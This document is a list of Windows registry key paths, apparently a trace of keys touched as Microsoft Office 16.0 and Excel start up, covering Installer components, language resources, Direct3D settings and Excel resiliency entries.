HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\7CA503EFF8D2D6843935591226A56DB7\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\568441CE89338D64097ACA530FE9F449
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\568441CE89338D64097ACA530FE9F449\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\42DFE5C4C26DDA643B2E1B3484F5CFCA
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\42DFE5C4C26DDA643B2E1B3484F5CFCA\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\492B803F9C3D84445A98619F89E031D3
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\492B803F9C3D84445A98619F89E031D3\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\95A9ED41010BA924891E408D13FBAA76
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\95A9ED41010BA924891E408D13FBAA76\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\C2D3C6C2DFB724740A4E4B0B2A54D044
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\C2D3C6C2DFB724740A4E4B0B2A54D044\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D8B2A845CEE54EC44A57186B5ECE7925
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D8B2A845CEE54EC44A57186B5ECE7925\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\32F51D7A41D895849B5D36E5D0069CD8
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\32F51D7A41D895849B5D36E5D0069CD8\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E584DF3B766E94F4090BF856C52425BA
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E584DF3B766E94F4090BF856C52425BA\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\06AC92CD1BDDEBC4B873F402329012C6
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\06AC92CD1BDDEBC4B873F402329012C6\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\5A9E53D7D94D36E4EA4A12EEF94D7086
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\5A9E53D7D94D36E4EA4A12EEF94D7086\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\C6DF6EA175C7A0240B2B10FDF2585BD1
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\C6DF6EA175C7A0240B2B10FDF2585BD1\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\22ADF1C4CAEE30248811919795CE877E
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\22ADF1C4CAEE30248811919795CE877E\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\39AE6A38F56EF6C4ABAD6D350D6CFEA1
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\39AE6A38F56EF6C4ABAD6D350D6CFEA1\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\3ED8D912A4A5CC74FA57E4C248AA17B4
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\3ED8D912A4A5CC74FA57E4C248AA17B4\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\7D0AC866B878B5145B6EC164ED85151B
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\7D0AC866B878B5145B6EC164ED85151B\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\52EF7531F13280A4DAFF25060DBF0508
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\52EF7531F13280A4DAFF25060DBF0508\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F0C7C77C6A9753F40A5A1D4EF678DF13
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F0C7C77C6A9753F40A5A1D4EF678DF13\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\376DDCFD80ED01249AC8112B8EE543FF
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\376DDCFD80ED01249AC8112B8EE543FF\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\3D9924FDD5EA83546A505DA15FA902E8
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\3D9924FDD5EA83546A505DA15FA902E8\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\8A4601ED49F6D194998E10FA9F6C0300
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\8A4601ED49F6D194998E10FA9F6C0300\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\712CCCD0696BA1442950CA32E7C6E64D
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\712CCCD0696BA1442950CA32E7C6E64D\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\52625D694C7E56F40B1664FA45158D4F
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\52625D694C7E56F40B1664FA45158D4F\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\5ED2E63ACCCE6D44D9F84B8D7FB73C68
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\5ED2E63ACCCE6D44D9F84B8D7FB73C68\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\EEE14C3FC3FEFA3458AD37B6FB29E0F0
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\EEE14C3FC3FEFA3458AD37B6FB29E0F0\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\2C6FF36D67277F846A233951912B7E0C
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\2C6FF36D67277F846A233951912B7E0C\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\EE86D47743D6EFB4F8BA1313727CB711
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\EE86D47743D6EFB4F8BA1313727CB711\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\96C59964CACA65D499A0D2D62A316FB7
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\96C59964CACA65D499A0D2D62A316FB7\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\AEB456C6427B5ED478C08584CF81B108
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\AEB456C6427B5ED478C08584CF81B108\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F30559A9485777D42AE55615AC729C5E
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F30559A9485777D42AE55615AC729C5E\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A725889A5DF965C4E84A0253A39A5952
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A725889A5DF965C4E84A0253A39A5952\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F4531591FCEEEA847980AFCF85694A10
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F4531591FCEEEA847980AFCF85694A10\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\2C6B91EE7E44A8147AFEED184561DAA8
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\2C6B91EE7E44A8147AFEED184561DAA8\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\3687791E032C1A747810904287441F47
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\3687791E032C1A747810904287441F47\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\02D8650385D45DC44B6E0BF69EF2846B
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\02D8650385D45DC44B6E0BF69EF2846B\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\8E6588906D8C60C43831FCEC4BD6F719
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\8E6588906D8C60C43831FCEC4BD6F719\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\413A5FB960BAC1A40A0B8DE39F0CB75E
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\413A5FB960BAC1A40A0B8DE39F0CB75E\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\08C0566F2C64AB248B37D78ABA9730ED
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\08C0566F2C64AB248B37D78ABA9730ED\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FA7B51453E2C43343BD5241072D09F18
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FA7B51453E2C43343BD5241072D09F18\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\702E54543307B3C42A4EE7EEFB06E454
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\702E54543307B3C42A4EE7EEFB06E454\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B3D93E8E53F48D638B29B48233F60E14
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B3D93E8E53F48D638B29B48233F60E14\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\C069AA2AC3DFD6A3DBF641390311FA3B
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\C069AA2AC3DFD6A3DBF641390311FA3B\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\8F139CF91DE936230A1FA8ED33D0E0EC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\8F139CF91DE936230A1FA8ED33D0E0EC\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\97FC00201A9B4EB359A592AFD9B4A1C5
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\97FC00201A9B4EB359A592AFD9B4A1C5\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\C8BA4DF4F75C28732903C9AC2251A33D
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\C8BA4DF4F75C28732903C9AC2251A33D\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B6AE1A6418D39933981921F7F7A77EA6
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B6AE1A6418D39933981921F7F7A77EA6\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\91EDD49C07CCA9B36AFAC57A43B0B9A9
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\91EDD49C07CCA9B36AFAC57A43B0B9A9\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6AF6D649BB945143DAD2D436C434C20F
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6AF6D649BB945143DAD2D436C434C20F\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\841B335EA38A88737A36C0C664FCC63C
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\841B335EA38A88737A36C0C664FCC63C\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\3A1C53B88CB3F7C33B57D6B5E272B8FF
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\3A1C53B88CB3F7C33B57D6B5E272B8FF\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0B76360A9B1D0AC35A81B25B36672275
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0B76360A9B1D0AC35A81B25B36672275\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\BF427A2B66EB00A3182637A36261AA34
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\BF427A2B66EB00A3182637A36261AA34\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\BCE00C92AF70C413399B4A50F82E20B5
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\BCE00C92AF70C413399B4A50F82E20B5\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\7FD8D5E49CB105931B840901B2EC77A7
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\7FD8D5E49CB105931B840901B2EC77A7\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\18E39E9B8AC8A5A3EA358562C997478C
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\18E39E9B8AC8A5A3EA358562C997478C\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\7E52BAFB9807F7F32B60B598A4DBB7A7
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\7E52BAFB9807F7F32B60B598A4DBB7A7\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\52FCE2A887EC8E939BD4BAB1A128F53C
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\52FCE2A887EC8E939BD4BAB1A128F53C\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\CF1288ED10B63B4328E2F1739AE9A4E2
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\CF1288ED10B63B4328E2F1739AE9A4E2\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\084451265844F4A47ABA441C208BA4B1
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\084451265844F4A47ABA441C208BA4B1\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D82BFA0262BF08949AC6E23C8EF18003
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D82BFA0262BF08949AC6E23C8EF18003\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D0B3D76D8121493449064B942F126861
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D0B3D76D8121493449064B942F126861\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\BECCD8561A9AEEF40A4B78A2B173394D
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\BECCD8561A9AEEF40A4B78A2B173394D\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\4D97A600289B46B42AC7370CB5D1432E
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\4D97A600289B46B42AC7370CB5D1432E\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\EAEB6DE731F9CE948A644F1360AC5BB3
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\EAEB6DE731F9CE948A644F1360AC5BB3\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\642F24263BBA5A94FA7EB6178A2B505B
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\642F24263BBA5A94FA7EB6178A2B505B\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F303394DBB2714E4BA8BC34DF322DBD9
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F303394DBB2714E4BA8BC34DF322DBD9\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6C9A6F846E2818A47A408CAF13381C71
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6C9A6F846E2818A47A408CAF13381C71\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F00000000000000000F01FEC\Usage
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F00000000000000000F01FEC\Usage\ProductFiles
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Common\LanguageResources
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Common\LanguageResources\SKULanguage
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages\en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\PreferredEditingLanguage
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\PreviousPreferredEditingLanguage
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\UIFallbackSource
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Common\LanguageResources\InstalledUICultures
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Common\LanguageResources\InstalledUICultures\en-us
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\UISnapshotLanguages
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\UIFallbackLanguages
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-2476309959-3960023044-3115063449-1000\Installer\Components\1A705E72D3831594090DD020E37EFC1A
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000\Software\Microsoft\Installer\Components\1A705E72D3831594090DD020E37EFC1A
HKEY_LOCAL_MACHINE\Software\Classes\Installer\Components\1A705E72D3831594090DD020E37EFC1A
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\FollowSystemUILanguage
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Common\LanguageResources\UILanguageInstallerFallbackOrder
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\HelpFallbackLanguages
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\HelpLanguageExplicit
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\UILanguageTag
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\HelpLanguageTag
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\ExeMode
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\LanguageResources\EnabledLanguages
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\LangTuneUp
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\InstallFonts
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Graphics
HKEY_CURRENT_USER\Software\Microsoft\Direct3D
HKEY_LOCAL_MACHINE\Software\Microsoft\Direct3D
HKEY_LOCAL_MACHINE\Software\Microsoft\Direct3D\DriverCompat
HKEY_LOCAL_MACHINE\Software\Microsoft\Direct3D\DriverCompat\Size
HKEY_LOCAL_MACHINE\Software\Microsoft\Direct3D\DriverCompat\Name
HKEY_LOCAL_MACHINE\Software\Microsoft\Direct3D\Drivers
HKEY_LOCAL_MACHINE\Software\Microsoft\Direct3D\Drivers\Size
HKEY_LOCAL_MACHINE\Software\Microsoft\Direct3D\Drivers\Name
HKEY_LOCAL_MACHINE\Software\Microsoft\Direct3D\DX6TextureEnumInclusionList
HKEY_LOCAL_MACHINE\Software\Microsoft\Direct3D\DX6TextureEnumInclusionList\Size
HKEY_LOCAL_MACHINE\Software\Microsoft\Direct3D\DX6TextureEnumInclusionList\Name
HKEY_CURRENT_USER\Software\Microsoft\DXGI
HKEY_LOCAL_MACHINE\Software\Microsoft\DXGI
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1A09ECE35544363439463E4AB55A621E
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1A09ECE35544363439463E4AB55A621E\00006109F00000000000000000F01FEC
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\EXCEL\Resiliency\StartupItems
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems\!vh
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems\"vh
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6D3588D4312FC664C94D84B670142C50
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6D3588D4312FC664C94D84B670142C50\00006109F00000000000000000F01FEC
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Excel\Resiliency\Security
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\Security
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2476309959-3960023044-3115063449-1000\Components\820E548C190EE2442820125F695C950A
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\820E548C190EE2442820125F695C950A
HKEY_LOCAL_MACHINE\Software\Classes\Installer\Features\00006109F00000000000000000F01FEC\EXCELFiles
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F00000000000000000F01FEC\Features\EXCELFiles
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\820E548C190EE2442820125F695C950A\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\DAC2F939EC01C57459C7E63331E5811F
